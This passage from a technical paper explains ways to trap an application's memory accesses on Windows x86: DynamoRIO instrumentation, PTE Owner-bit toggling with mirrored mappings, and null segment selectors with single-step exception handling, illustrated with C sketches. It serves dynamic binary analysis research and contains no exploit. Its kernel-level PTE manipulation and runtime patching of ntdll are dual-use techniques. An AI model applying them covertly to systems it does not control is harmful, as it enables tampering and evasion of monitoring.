obtained. Analysis libraries are free to control the level of information
|
||||
that they retrieve. Using this knowledge of DynamoRIO, it is now possible
|
||||
to consider how one might design an analysis library that is able to
|
||||
intercept memory reads and writes while an application is executing.
|
||||
|
||||
2.1.1) Design
|
||||
|
||||
DBI, and DynamoRIO in particular, make designing a solution that can intercept
|
||||
memory reads and writes fairly trivial. The basic design involves having an
|
||||
analysis library that scans the instructions within a fragment that is being
|
||||
created. When an instruction that accesses memory is encountered,
|
||||
instrumentation code can be inserted prior to the instruction. The
|
||||
instrumentation code can be composed of instructions that notify an
|
||||
instrumentation function of the memory operand that is about to be read from
|
||||
or written to. This has the effect of causing the instrumentation function to
|
||||
be called when the fragment is executed. These few steps are really all that
|
||||
it takes to instrument the memory access behavior of an application as it
|
||||
executes using DynamoRIO.
|
||||
|
||||
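The design above can be sketched without DynamoRIO itself. The following C
fragment is a simplified model under stated assumptions: instructions are
reduced to a hypothetical toy_instr record that already says whether memory
is read or written, and the inserted instrumentation is represented by an
OP_NOTIFY entry. A real analysis library would instead inspect the operands
that the framework decodes and emit real instructions.

```c
#include <stddef.h>

/* Hypothetical, simplified instruction kinds used only by this sketch. */
typedef enum { OP_REG_ONLY, OP_MEM_READ, OP_MEM_WRITE, OP_NOTIFY } op_kind;

typedef struct {
    op_kind kind;
    int     id;   /* identifies the original instruction; for OP_NOTIFY,
                     the id of the instruction being announced */
} toy_instr;

/*
 * Copies the fragment in `in` to `out`, inserting an OP_NOTIFY entry
 * immediately before every instruction that reads or writes memory.
 * Returns the number of entries written, or 0 if `out` is too small
 * (or the input fragment is empty).
 */
static size_t instrument_fragment(const toy_instr *in, size_t n,
                                  toy_instr *out, size_t out_cap)
{
    size_t w = 0;
    for (size_t i = 0; i < n; i++) {
        int touches_mem = in[i].kind == OP_MEM_READ ||
                          in[i].kind == OP_MEM_WRITE;
        if (w + (touches_mem ? 2u : 1u) > out_cap)
            return 0;
        if (touches_mem) {
            out[w].kind = OP_NOTIFY;   /* runs before the access itself */
            out[w].id   = in[i].id;
            w++;
        }
        out[w++] = in[i];
    }
    return w;
}
```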
2.1.2) Implementation
|
||||
|
||||
The implementation of the DBI approach is really just as easy as the design
|
||||
description makes it sound. To cooperate with DynamoRIO, an analysis library
|
||||
must implement a well-defined routine named dynamorio_basic_block which is
|
||||
called by DynamoRIO when a fragment is being created. This routine is passed
|
||||
an instruction list which contains the set of instructions taken from the
|
||||
native binary. Using this instruction list, the analysis library can make a
|
||||
determination as to whether or not any of the operands of an instruction
|
||||
either explicitly or implicitly reference memory. If an instruction does
|
||||
access memory, then instrumentation code must be inserted.
|
||||
|
||||
Inserting instrumentation code with DynamoRIO is a pretty painless process.
|
||||
DynamoRIO provides a number of macros that encapsulate the process of creating
|
||||
and inserting instructions into the instruction list. For example,
|
||||
INSTR_CREATE_add will create an add instruction with a specific set of arguments
|
||||
and instrlist_meta_preinsert will insert an instruction prior to another
|
||||
instruction within the instruction list.
|
||||
|
||||
A proof of concept implementation is included with the source code provided
|
||||
along with this paper.
|
||||
|
||||
2.1.3) Considerations
|
||||
|
||||
This approach is particularly elegant thanks to the concepts of dynamic binary
|
||||
instrumentation and to DynamoRIO itself for providing an elegant framework
|
||||
that supports inserting instrumentation code into the fragment cache. Since
|
||||
DynamoRIO is explicitly designed to be a runtime optimization engine, the fact
|
||||
that the instrumentation code is cached within the fragment cache means that
|
||||
it gains the benefits of DynamoRIO's fragment optimization algorithms. When
|
||||
compared to alternative approaches, this approach also has significantly less
|
||||
overhead once the fragment cache begins to become populated. This is because
|
||||
all of the instrumentation code is placed entirely inline with the application
|
||||
code that is executing rather than having to rely on alternative means of
|
||||
interrupting the normal course of program execution. Still, this approach is
|
||||
not without its set of considerations. Some of these considerations are
|
||||
described below:
|
||||
|
||||
1. Requires the use of a disassembler
|
||||
DynamoRIO depends on its own internal disassembler. This can be a source
|
||||
of problems and limitations.
|
||||
|
||||
2. Self-modifying and dynamic code
|
||||
Self-modifying and dynamically generated code can potentially cause problems
|
||||
with DynamoRIO.
|
||||
|
||||
3. DynamoRIO is closed source
|
||||
While this has nothing to do with the actual concept, the fact that
|
||||
DynamoRIO is closed source can be limiting in the event that there are
|
||||
issues with DynamoRIO itself.
|
||||
|
||||
2.2) Page Access Interception
|
||||
|
||||
The hardware paging features of the x86 and x64 architectures represent a
|
||||
potentially useful means of obtaining information about the memory access
|
||||
behavior of an application. This is especially true due to the well-defined
|
||||
actions that the processor takes when a reference is made to a linear address
|
||||
whose physical page is either not present or has had its access restricted.
|
||||
In these cases, the processor will raise the page fault exception (0x0E) and
|
||||
thereby force the operating system to attempt to gracefully handle the virtual
|
||||
memory reference. In Windows, the page fault interrupt is handled by
|
||||
nt!KiTrap0E. In most cases, nt!KiTrap0E will issue a call into
|
||||
nt!MmAccessFault which is responsible for making a determination about the
|
||||
nature of the memory reference that occurred. If the memory reference fault
|
||||
was a result of an access restriction, nt!MmAccessFault will return an access
|
||||
violation error code (0xC0000005). When an access violation occurs, an
|
||||
exception record is generated by the kernel and is then passed to either the
|
||||
user-mode exception dispatcher or the kernel-mode exception dispatcher
|
||||
depending on which mode the memory access occurred in. The job of the
|
||||
exception dispatcher is to give a thread an opportunity to gracefully recover
|
||||
from the exception. This is accomplished by providing each of the registered
|
||||
or vectored exception handlers with the exception information that was
|
||||
collected when the page fault occurred. If an exception handler is able to
|
||||
recover, execution of the thread can simply restart where it left off. Using
|
||||
the principles outlined above, it is possible to design a system that is
|
||||
capable of both trapping and handling memory references to specific pages in
|
||||
memory during the course of normal process execution.
|
||||
|
||||
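When the processor raises a page fault it also pushes an error code whose low
bits describe the access that failed. The C sketch below decodes those three
bits as they are defined by the x86 architecture. The type pf_info and the
function decode_pf_error are names invented for this illustration and are not
part of Windows or of the code released with this paper.

```c
#include <stdint.h>

/* Low bits of the x86 page fault error code pushed by the processor. */
#define PF_PRESENT 0x1u  /* 0: page not present, 1: protection violation */
#define PF_WRITE   0x2u  /* 0: read access,      1: write access         */
#define PF_USER    0x4u  /* 0: supervisor mode,  1: user mode            */

typedef struct {
    int protection_violation;
    int is_write;
    int from_user_mode;
} pf_info;

/* Splits a page fault error code into the three flags defined above. */
static pf_info decode_pf_error(uint32_t error_code)
{
    pf_info info;
    info.protection_violation = (error_code & PF_PRESENT) != 0;
    info.is_write             = (error_code & PF_WRITE) != 0;
    info.from_user_mode       = (error_code & PF_USER) != 0;
    return info;
}
```

A user-mode write to a page that is present but restricted to the kernel
would therefore arrive with all three bits set (0x7).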
2.2.1) Design
|
||||
|
||||
The first step that must be taken to implement this system involves
|
||||
identifying a method that can be used to trap references to arbitrary pages in
|
||||
memory. Fortunately, previous work has done much to identify some of the
|
||||
different approaches that can be taken to accomplish this[8, 4]. For the purposes
|
||||
of this paper, one of the most useful approaches centers around the ability to
|
||||
define whether or not a page is restricted from user-mode access. This is
|
||||
controlled by the Owner bit in a linear address' page table entry (PTE)[5]. When
|
||||
the Owner bit is set to 0, the page can only be accessed at privilege levels 0-2.
|
||||
This effectively restricts access to kernel-mode in all modern operating
|
||||
systems. Likewise, when the Owner bit is set to 1, the page can be accessed
|
||||
from all privilege levels. By toggling the Owner bit to 0 in the PTEs
|
||||
associated with a given set of linear addresses, it is possible to trap all
|
||||
user-mode references to those addresses at runtime. This effectively solves
|
||||
the first hurdle in implementing a solution to intercept memory access
|
||||
behavior.
|
||||
|
||||
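The bit manipulation involved is small. The following C sketch treats a PTE
as a plain 32-bit value and shows the Owner bit, which the processor manuals
call the User/Supervisor flag (bit 2). The helper names are hypothetical. The
sketch ignores the page directory entry, whose own flag also takes part in the
access check, and it does not perform the TLB invalidation that a real driver
would need after changing a live PTE.

```c
#include <stdint.h>

#define PTE_PRESENT 0x1u  /* bit 0: page is present                */
#define PTE_WRITE   0x2u  /* bit 1: page is writable               */
#define PTE_OWNER   0x4u  /* bit 2: User/Supervisor ("Owner") flag */

/* Clears the Owner bit so that user-mode references to the page fault. */
static uint32_t pte_restrict_to_kernel(uint32_t pte)
{
    return pte & ~PTE_OWNER;
}

/* Sets the Owner bit so that the page is reachable from user-mode again. */
static uint32_t pte_allow_user(uint32_t pte)
{
    return pte | PTE_OWNER;
}

/* Returns 1 if this PTE, taken on its own, permits user-mode access. */
static int pte_user_accessible(uint32_t pte)
{
    return (pte & PTE_PRESENT) != 0 && (pte & PTE_OWNER) != 0;
}
```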
Using the approach outlined above, any reference that is made from user-mode
|
||||
to a linear address whose PTE has had the Owner bit set to 0 will result in an
|
||||
access violation exception being passed to the user-mode exception dispatcher.
|
||||
This exception must be handled by a custom exception handler that is able to
|
||||
distinguish transient access violations from ones that occurred as a result of
|
||||
the Owner bit having been modified. This custom exception handler must also
|
||||
be able to recover from the exception in a manner that allows execution to
|
||||
resume seamlessly. Distinguishing exceptions is easy if one assumes that the
|
||||
custom exception handler has knowledge in advance of the address regions that
|
||||
have had their Owner bit modified. Given this assumption, the act of
|
||||
distinguishing exceptions is as simple as seeing if the fault address is
|
||||
within an address region that is currently being monitored. While
|
||||
distinguishing exceptions may be easy, being able to gracefully recover is an
|
||||
entirely different matter.
|
||||
|
||||
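The check that separates monitored faults from unrelated access violations
can be sketched as a lookup over a table of tracked regions. The structure
monitored_region and the function find_monitored_region are hypothetical
names used only for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* One address range whose PTEs have had the Owner bit cleared. */
typedef struct {
    uintptr_t base;
    size_t    size;
} monitored_region;

/*
 * Returns the index of the region that contains fault_addr, or -1 if the
 * fault did not land in any monitored region and should be passed on.
 */
static int find_monitored_region(const monitored_region *regions,
                                 size_t count, uintptr_t fault_addr)
{
    for (size_t i = 0; i < count; i++) {
        if (fault_addr >= regions[i].base &&
            fault_addr - regions[i].base < regions[i].size)
            return (int)i;
    }
    return -1;
}
```

Comparing the offset against the size, rather than comparing against base
plus size, avoids an overflow when a region ends at the top of the address
space.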
To recover and resume execution with no noticeable impact to an application
|
||||
means that the exception handler must have a mechanism that allows the
|
||||
application to access the data stored in the pages whose virtual mappings have
|
||||
had their access restricted to kernel-mode. This, of course, would imply that
|
||||
the application must have some way, either direct or indirect, to access the
|
||||
contents of the physical pages associated with the virtual mappings that have
|
||||
had their PTEs modified. The most obvious approach would be to simply toggle
|
||||
the Owner bit to permit user-mode access. This has many different problems,
|
||||
not the least of which being that doing so would be expensive and would not
|
||||
behave properly in multi-threaded environments (memory accesses could be
|
||||
missed or worse). An alternative to updating the Owner bit would be to have a
|
||||
device driver designed to provide support to processes that would allow them
|
||||
to read the contents of a virtual address at privilege level 0. However,
|
||||
having the ability to read and write memory through a driver means nothing if
|
||||
the results of the operation cannot be factored back into the instruction that
|
||||
triggered the exception.
|
||||
|
||||
Rather than attempting to emulate the read and write access, a better approach
|
||||
can be used. This approach involves creating a second virtual mapping to the
|
||||
same set of physical pages described by the linear addresses whose PTEs were
|
||||
modified. This second virtual mapping would behave like a typical user-mode
|
||||
memory mapping. In this way, the process' virtual address space would contain
|
||||
two virtual mappings to the same set of physical pages. One mapping, which
|
||||
will be referred to as the original mapping, would represent the user-mode
|
||||
inaccessible set of virtual addresses. The second mapping, which will be
|
||||
referred to as the mirrored mapping, would be the user-mode accessible set of
|
||||
virtual addresses. By mapping the same set of physical pages at two
|
||||
locations, it is possible to transparently redirect address references at the
|
||||
time that exceptions occur. An important thing to note is that in order to
|
||||
provide support for mirroring, a disassembler must be used to figure out which
|
||||
registers need to be modified.
|
||||
|
||||
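Because both mappings cover the same physical pages, redirecting a reference
amounts to carrying the offset from one base address over to the other. A
minimal sketch, using a hypothetical mirror_mapping structure:

```c
#include <stddef.h>
#include <stdint.h>

/* Describes one original mapping and its user-accessible mirror. */
typedef struct {
    uintptr_t original_base;  /* user-mode inaccessible mapping */
    uintptr_t mirror_base;    /* user-mode accessible mapping   */
    size_t    size;           /* length of both mappings        */
} mirror_mapping;

/*
 * Translates an address inside the original mapping to the equivalent
 * address inside the mirrored mapping. Returns 0 if addr is not within
 * the original mapping.
 */
static uintptr_t to_mirror(const mirror_mapping *m, uintptr_t addr)
{
    if (addr < m->original_base || addr - m->original_base >= m->size)
        return 0;
    return m->mirror_base + (addr - m->original_base);
}
```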
To better understand how this could work, consider a scenario where an
|
||||
application contains a mov [eax], 0x1 instruction. For the purposes of this
|
||||
example, assume that the eax register contains an address that is within the
|
||||
original mapping as described above. When this instruction executes, it will
|
||||
lead to an access violation exception being generated as a result of the PTE
|
||||
modifications that were made to the original mapping. When the exception
|
||||
handler inspects this exception, it can determine that the fault address was
|
||||
one that is contained within the original mapping. To allow execution to
|
||||
resume, the exception handler must update the eax register to point to the
|
||||
equivalent address within the mirrored region. Once it has altered the value
|
||||
of eax, the exception handler can tell the exception dispatcher to continue
|
||||
execution with the now-modified register information. From the perspective of
|
||||
an executing application, this entire operation will occur transparently.
|
||||
Unfortunately, there's still more work that needs to be done in order to
|
||||
ensure that the application continues to execute properly after the exception
|
||||
dispatcher continues execution.
|
||||
|
||||
The biggest problem with modifying the value of a register to point to the
|
||||
mirrored address is that it can unintentionally alter the behavior of
|
||||
subsequent instructions. For example, the application may not function
|
||||
properly if it assumes that it can access other non-mirrored memory addresses
|
||||
relative to the address stored within eax. Not only that, but allowing eax to
|
||||
continue to be accessed through the mirrored address will mean that subsequent
|
||||
reads and writes to memory made using the eax register will be missed for the
|
||||
time that eax contains the mirrored address.
|
||||
|
||||
In order to solve this problem, it is necessary to come up with a method of
|
||||
restoring registers to their original value after the instruction executes.
|
||||
Fortunately, the underlying architecture has built-in support that allows a
|
||||
program to be notified after it has executed an instruction. This support is
|
||||
known as single-stepping. To make use of single-stepping, the exception
|
||||
handler can set the trap flag (0x100) in the saved value of the eflags
|
||||
register. When execution resumes, the processor will generate a single step
|
||||
exception after the original instruction executes. This will result in the
|
||||
custom exception handler being called. When this occurs, the custom exception
|
||||
handler can determine if the single step exception occurred as a result of a
|
||||
previous mirroring operation. If it was the result of a mirroring operation,
|
||||
the exception handler can take steps to restore the appropriate register to
|
||||
its original value.
|
||||
|
||||
Using these four primary steps, a complete solution to the problem of
|
||||
intercepting memory accesses can be formed. First, the Owner bit of the PTEs
|
||||
associated with a region of virtual memory can be set to 0. This will cause
|
||||
user-mode references to this region to generate an access violation exception.
|
||||
Second, an additional mapping to the set of physical pages described by the
|
||||
original mapping can be created which is accessible from user-mode. Third,
|
||||
any access violation exceptions that reach the custom exception handler can be
|
||||
inspected. If they are the result of a reference to a region that is being
|
||||
tracked, the register contents of the thread context can be adjusted to
|
||||
reference the user-accessible mirrored mapping. The thread can then be
|
||||
single-stepped so that the fourth and final step can be taken. When a
|
||||
single-step exception is generated, the custom exception handler can restore
|
||||
the original value of the register that was modified. When this is complete,
|
||||
the thread can be allowed to continue as if nothing had happened.
|
||||
|
||||
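The third and fourth steps can be modeled as a small state machine. The C
sketch below is a simulation under several assumptions and is not the
implementation released with this paper: the thread context is reduced to a
hypothetical toy_context holding only eax and eflags, the faulting instruction
is assumed to address memory through eax with no displacement (so the
disassembler step is skipped), and only one thread and one region are tracked.

```c
#include <stdint.h>

#define TRAP_FLAG 0x100u   /* single-step (trap) flag in eflags */

typedef enum { EXC_ACCESS_VIOLATION, EXC_SINGLE_STEP } toy_exception;
typedef enum { PASS_TO_NEXT_HANDLER, CONTINUE_EXECUTION } toy_disposition;

/* Hypothetical stand-in for the saved thread context. */
typedef struct {
    uint32_t eax;
    uint32_t eflags;
} toy_context;

typedef struct {
    uint32_t original_base;
    uint32_t mirror_base;
    uint32_t size;
    int      pending;     /* a mirrored access awaits its single step */
    uint32_t saved_eax;   /* register value to restore afterwards     */
} mirror_state;

static toy_disposition handle_exception(mirror_state *s, toy_context *ctx,
                                        toy_exception exc,
                                        uint32_t fault_addr)
{
    if (exc == EXC_ACCESS_VIOLATION) {
        if (fault_addr < s->original_base ||
            fault_addr - s->original_base >= s->size)
            return PASS_TO_NEXT_HANDLER;      /* not a tracked region */
        /* Step 3: redirect the register to the mirror and single-step. */
        s->saved_eax = ctx->eax;
        s->pending   = 1;
        ctx->eax     = s->mirror_base + (fault_addr - s->original_base);
        ctx->eflags |= TRAP_FLAG;
        return CONTINUE_EXECUTION;
    }
    /* Step 4: the instruction has executed, so undo the redirection. */
    if (!s->pending)
        return PASS_TO_NEXT_HANDLER;          /* someone else's step  */
    ctx->eax     = s->saved_eax;
    ctx->eflags &= ~TRAP_FLAG;
    s->pending   = 0;
    return CONTINUE_EXECUTION;
}
```

Restoring the saved value is only correct when the instruction did not itself
write to the redirected register, which is one more reason a real handler
needs the disassembler.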
2.2.2) Implementation
|
||||
|
||||
An implementation of this approach is included with the source code released
|
||||
along with this paper. This implementation has two main components: a
|
||||
kernel-mode driver and a user-mode DLL. The kernel-mode driver provides a
|
||||
device object interface that allows a user-mode process to create a mirrored
|
||||
mapping of a set of physical pages and to toggle the Owner bit of PTEs
|
||||
associated with address regions. The user-mode DLL is responsible for
|
||||
implementing a vectored exception handler that takes care of processing access
|
||||
violation exceptions by mirroring the address references to the appropriate
|
||||
mirrored region. The user-mode DLL also exposes an API that allows
|
||||
applications to create a memory mirror. This abstracts the entire process and
|
||||
makes it simple to begin tracking a specific memory region. The API also
|
||||
allows applications to register callbacks that are notified when an address
|
||||
reference occurs. This allows further analysis of the memory access behavior
|
||||
of the application.
|
||||
|
||||
2.2.3) Considerations
|
||||
|
||||
While this approach is most definitely functional, it comes with a number of
|
||||
caveats that make it sub-optimal for any sort of large-scale deployment. The
|
||||
following considerations are by no means all-encompassing, but some of the
|
||||
more important ones have been enumerated below:
|
||||
|
||||
1. Unsafe modification of PTEs
|
||||
It is not safe to modify PTEs without acquiring certain locks.
|
||||
Unfortunately, these locks are not exported and are therefore inaccessible
|
||||
to third party drivers.
|
||||
|
||||
2. Large amount of overhead
|
||||
The overhead associated with having to take a page fault and pass the
|
||||
exception on to be handled by user-mode is substantial. Memory access
|
||||
time with respect to the application could jump from nanoseconds to
microseconds or even milliseconds.
|
||||
|
||||
3. Requires the use of a disassembler
|
||||
Since this approach relies on mirroring memory references from one virtual
|
||||
address to another, a disassembler has to be used to figure out which
|
||||
registers need to be modified with the mirrored address. Any time a
|
||||
disassembler is needed is an indication that things are getting fairly
|
||||
complicated.
|
||||
|
||||
4. Cannot track memory references to all addresses
|
||||
The fact that this approach relies on locking physical pages prevents it
|
||||
from feasibly tracking all memory references. In addition, because the
|
||||
thread stack is required to be valid in order to dispatch exceptions, it's
|
||||
not possible to track reads and writes to thread stacks using this
|
||||
approach.
|
||||
|
||||
2.3) Null Segment Interception
|
||||
|
||||
Segmentation is an extremely old feature of the x86 architecture. Its purpose
|
||||
has been to provide software with the ability to partition the address space
|
||||
into distinct segments that can be referenced through a 16-bit segment
|
||||
selector. Segment selectors are used to index either the Global Descriptor
|
||||
Table (GDT) or the Local Descriptor Table (LDT). Segment descriptors convey
|
||||
information about all or a portion of the address space. On modern 32-bit
|
||||
operating systems, segmentation is used to set up a flat memory model
|
||||
(primarily only used because there is no way to disable it). This is further
|
||||
illustrated by the fact that the x64 architecture has effectively done away
|
||||
with the ES, DS, and SS segment registers in 64-bit mode. While segment
|
||||
selectors are primarily intended to make it possible to access memory, they
|
||||
can also be used to prevent access to it.
|
||||
|
||||
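For reference, a 16-bit segment selector packs three fields: a descriptor
table index in bits 3 through 15, a table indicator in bit 2 (0 for the GDT,
1 for the LDT), and a requested privilege level in bits 0 and 1. The C sketch
below decodes them. The names selector_fields, decode_selector, and
is_null_selector are invented for this illustration.

```c
#include <stdint.h>

typedef struct {
    unsigned index;     /* bits 3-15: index into the descriptor table */
    unsigned uses_ldt;  /* bit 2: 0 selects the GDT, 1 the LDT        */
    unsigned rpl;       /* bits 0-1: requested privilege level        */
} selector_fields;

/* Splits a segment selector into its three architectural fields. */
static selector_fields decode_selector(uint16_t sel)
{
    selector_fields f;
    f.index    = (unsigned)sel >> 3;
    f.uses_ldt = ((unsigned)sel >> 2) & 1u;
    f.rpl      = (unsigned)sel & 3u;
    return f;
}

/* A null selector refers to entry 0 of the GDT, whatever its RPL is. */
static int is_null_selector(uint16_t sel)
{
    return (sel & 0xFFFCu) == 0;
}
```

Applied to 0x23, the user-mode data selector that 32-bit Windows uses, this
yields GDT index 4 with a requested privilege level of 3.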
2.3.1) Design
|
||||
|
||||
Segmentation is one of the easiest ways to trap memory accesses. The majority
|
||||
of instructions which reference memory implicitly use either the DS or ES
|
||||
segment registers to do so. The one exception to this rule is instructions
|
||||
that deal with the stack. These instructions implicitly use the SS segment
|
||||
register. There are a few different ways one can go about causing a general
|
||||
protection fault when accessing an address relative to a segment selector, but
|
||||
one of the easiest is to take advantage of the null selector. The null
|
||||
selector, 0x0, is a special segment selector that will always cause a general
|
||||
protection fault when using it to reference memory. By loading the null
|
||||
selector into DS, for example, the mov [eax], 0x1 instruction would cause a
|
||||
general protection fault when executed. Using the null selector solves the
|
||||
problem of being able to intercept memory accesses, but there still needs to
|
||||
be some mechanism to allow the application to execute normally after
|
||||
intercepting the memory access.
|
||||
|
||||
When a general protection fault occurs in user-mode, the kernel generates an
|
||||
access violation exception and passes it off to the user-mode exception
|
||||
dispatcher in much the same way as was described in 2.2. Registering a custom
|
||||
exception handler makes it possible to catch this exception and handle it
|
||||
gracefully. To handle this exception, the custom exception handler must
|
||||
restore DS and ES segment registers to valid segment selectors by updating the
|
||||
thread context record associated with the exception. On 32-bit versions of
|
||||
Windows, the segment registers should be restored to 0x23. Once the
|
||||
segment registers have been updated, the exception dispatcher can be told to
|
||||
continue execution. However, before this happens, there is an additional step
|
||||
that must be taken.
|
||||
|
||||
It is not enough to simply restore the segment registers and then continue
|
||||
execution. This would lead to subsequent reads and writes being missed as a
|
||||
result of the DS and ES segment registers no longer pointing to the null
|
||||
selector. To address this, the custom exception handler should set the
|
||||
trap flag in the context record prior to continuing execution. Setting the
|
||||
trap flag will cause the processor to generate a single step exception after
|
||||
the instruction that generated the general protection fault executes. This
|
||||
single step exception can then be processed by the custom exception handler to
|
||||
reset the DS and ES segment registers to the null selector. After the segment
|
||||
registers have been updated, the trap flag can be disabled and execution can
|
||||
be allowed to continue. By following these steps, the application is able to
|
||||
make forward progress while also making it possible to trap all memory reads
|
||||
and writes that use the DS and ES segment registers.
|
||||
|
||||
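The restore, single-step, and re-arm cycle described above can be simulated
in portable C. This is a sketch under stated assumptions rather than the
released implementation: seg_context is a hypothetical stand-in for the thread
context, the handler decides that a fault is its own by checking whether DS or
ES currently holds the null selector, and every single step exception is
assumed to come from a previous restore.

```c
#include <stdint.h>

#define TRAP_FLAG     0x100u  /* single-step (trap) flag in eflags       */
#define NULL_SELECTOR 0x00u
#define USER_DATA_SEL 0x23u   /* flat user data selector, 32-bit Windows */

typedef enum { SEG_ACCESS_VIOLATION, SEG_SINGLE_STEP } seg_exception;

/* Hypothetical stand-in for the saved thread context. */
typedef struct {
    uint16_t seg_ds;
    uint16_t seg_es;
    uint32_t eflags;
} seg_context;

/*
 * Returns 1 if the exception was handled and execution should continue,
 * or 0 if it should be passed on. *access_count is incremented once for
 * every intercepted memory access.
 */
static int handle_segment_exception(seg_context *ctx, seg_exception exc,
                                    unsigned *access_count)
{
    if (exc == SEG_ACCESS_VIOLATION) {
        if (ctx->seg_ds != NULL_SELECTOR && ctx->seg_es != NULL_SELECTOR)
            return 0;                   /* not caused by the null selector */
        (*access_count)++;
        ctx->seg_ds  = USER_DATA_SEL;   /* let the instruction execute     */
        ctx->seg_es  = USER_DATA_SEL;
        ctx->eflags |= TRAP_FLAG;       /* regain control right after it   */
        return 1;
    }
    /* Single step: re-arm the trap for the next memory access. */
    ctx->seg_ds  = NULL_SELECTOR;
    ctx->seg_es  = NULL_SELECTOR;
    ctx->eflags &= ~TRAP_FLAG;
    return 1;
}
```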
2.3.2) Implementation
|
||||
|
||||
The implementation for this approach involves registering a vectored exception
|
||||
handler that is able to handle the access violation and single step exceptions
|
||||
that are generated. Since this approach relies on setting the segment
|
||||
registers DS and ES to the null selector, an implementation must take steps to
|
||||
update the segment register state for each running thread in a process and for
|
||||
all new threads as they are created. Updating the segment register state for
|
||||
running threads involves enumerating running threads in the calling process
|
||||
using the toolhelp library. For each thread that is not the calling thread,
|
||||
the SetThreadContext routine can be used to update segment registers. The
|
||||
calling thread can update the segment registers using native instructions. To
|
||||
alter the segment registers for new threads, the DLL_THREAD_ATTACH notification
|
||||
can be used. Once all threads have had their DS and ES segment registers
|
||||
updated, memory references will immediately begin causing access violation
|
||||
exceptions.
|
||||
|
||||
When these access violation exceptions are passed to the vectored exception
|
||||
handler, appropriate steps must be taken to restore the DS and ES segment
|
||||
registers to a valid segment selector, such as 0x23. This is accomplished by
|
||||
updating the SegDs and SegEs segment registers in the CONTEXT structure that
|
||||
is passed in association with an exception. In addition to updating these
|
||||
segment registers, the trap flag (0x100) must also be set in the EFlags
|
||||
register so that the DS and ES segment registers can be restored to the null
|
||||
selector in order to trap subsequent memory accesses. Setting the trap flag
|
||||
will lead to a single step exception after the instruction that generated the
|
||||
access violation executes. When the single step exception is received, the
|
||||
SegDs and SegEs segment registers can be restored to the null selector.
|
||||
|
||||
These few steps capture the majority of the implementation, but there is a
|
||||
specific Windows nuance that must be handled in order for this to work right.
|
||||
When the Windows kernel returns to a user-mode process after a system call has
|
||||
completed, it restores the DS and ES segment selectors to their normal value
|
||||
of 0x23. The problem with this is that without some way to reset the segment
|
||||
registers to the null selector after a system call returns, there is no way to
|
||||
continue to track memory accesses after a system call. Fortunately, there is
|
||||
a relatively painless way to reset the segment registers after a system call
|
||||
returns. On Windows XP SP2 and more recent versions of Windows, the kernel
|
||||
determines where to transfer control to after a system call returns by looking
|
||||
at the function pointer stored in the shared user data memory mapping.
|
||||
Specifically, the SystemCallReturn attribute at 0x7ffe0304 holds a pointer to
|
||||
a location in ntdll that typically contains just a ret instruction as shown
|
||||
below:
|
||||
|
||||
0:001> u poi(0x7ffe0304)
|
||||
ntdll!KiFastSystemCallRet:
|
||||
7c90eb94 c3 ret
|
||||
7c90eb95 8da42400000000 lea esp,[esp]
|
||||
7c90eb9c 8d642400 lea esp,[esp]
|
||||
|
||||
Replacing this single ret instruction with code that resets the DS and ES
|
||||
registers to the null selector followed by a ret instruction is enough to make
|
||||
it possible to continue to trap memory accesses after a system call returns.
|
||||
However, this replacement code should not take these steps if a system call
|
||||
occurs in the context of the exception dispatcher, as this could lead to a
|
||||
nesting issue if anything in the exception dispatcher references memory, which
|
||||
is very likely.
|
||||
|
||||
An implementation of this approach is included with the source code provided
|
||||
along with this paper.
|
||||
|
||||
2.3.3) Considerations
|
||||
|
||||
There are a few considerations that should be noted about this approach. On
|
||||
the positive side, this approach is unique when compared to the others
|
||||
described in this paper due to the fact that, in principle, it should be
|
||||
possible to use it to trap memory accesses in kernel-mode, although it is
|
||||
expected that the implementation may be much more complicated. This approach
|
||||
is also much simpler than the other approaches in that it requires far less
|
||||
code. While these are all good things, there are some negative considerations
|
||||
that should also be pointed out. These are enumerated below:
|
||||
|
||||
1. Will not work on x64
|
||||
The segmentation approach described in this section will not work on x64
|
||||
due to the fact that the DS, ES, and even SS segment selectors are
|
||||
effectively ignored when the processor is in 64-bit mode.
|
||||
|
||||
2. Significant performance overhead
|
||||
Like many of the other approaches, this one also suffers from significant
|
||||
performance overhead involved in having to take a GP and DB fault for
|
||||
every address reference. This approach could be further optimized by
|
||||
creating a custom LDT entry (using NtSetLdtEntries) that describes a
|
||||
region whose base address is 0 and length is n where n is just below the
|
||||
address of the region(s) that should be monitored. This would have the
|
||||
effect of allowing memory accesses to succeed within the lower portion of
|
||||
the address space and fail in the higher portion (which is being
|
||||
monitored). It's important to note that the base address of the LDT entry
|
||||
must be zero. This is problematic since most of the regions that one
|
||||
would like to monitor (heap) are allocated low in the address space. It
|
||||
would be possible to work around this issue by having
|
||||
NtAllocateVirtualMemory allocate using MEM_TOP_DOWN.
|
||||
|
||||
3. Requires a disassembler
|
||||
Unfortunately, this approach also requires the use of a disassembler in
|
||||
order to extract the effective address that caused the access violation
|
||||
exception to occur. This is necessary because general protection faults
|
||||
that occur due to a segment selector issue generate exception records that
|
||||
flag the fault address as being 0xffffffff. This makes sense in the
|
||||
context that without a valid segment selector, there is no way to
|
||||
accurately calculate the effective address. The use of a disassembler
|
||||
means that the code is inherently more complicated than it would otherwise
|
||||
need to be. There may be some way to craft a special LDT entry that would
|
||||
still make it possible to determine the address that caused the fault, but
|
||||
the author has not investigated this.
|
||||
|
||||
3) Potential Uses
|
||||
|
||||
The ability to intercept an application's memory accesses is an interesting
|
||||
concept but without much use beyond simple statistical and visual analysis.
|
||||
Even though this is the case, the data that can be collected by analyzing
|
||||
memory access behavior can make it possible to perform much more extensive
|
||||
forms of dynamic binary analysis. This section will give a brief introduction
|
||||
to some of the hypothetical areas that might benefit from being able to
|
||||
understand the memory access behavior of an application.
|
||||
|
||||
3.1) Data Propagation
|
||||
|
||||
Being able to gain knowledge about the way that data propagates throughout an
|
||||
application can provide extremely useful insights. For example, understanding
|
||||
data propagation can give security researchers an idea of the areas of code
|
||||
that are affected, either directly or indirectly, by a buffer that is received
|
||||
from a network socket. In this context, having knowledge about areas affected
|
||||
by data would be much more valuable than simply understanding the code paths
|
||||
that are taken as a result of the buffer being received. Though the two may
|
||||
seem closely related, the areas of code affected by a buffer that is received
|
||||
should actually be restricted to a subset of the overall code paths taken.
|
||||
|
||||
Even if understanding data propagation within an application is beneficial, it
|
||||
may not be clear exactly how analyzing memory access behavior could make this
|
||||
possible. To understand how this might work, it's best to think of memory
|
||||
access in terms of its two basic operations: read and write. In the course of
|
||||
normal execution, any instruction that reads from a location in memory can be
|
||||
said to be dependent on the last instruction that wrote to that location.
|
||||
When an instruction writes to a location in memory, it can be said that any
|
||||
instructions that originally wrote to that location no longer have claim over
|
||||
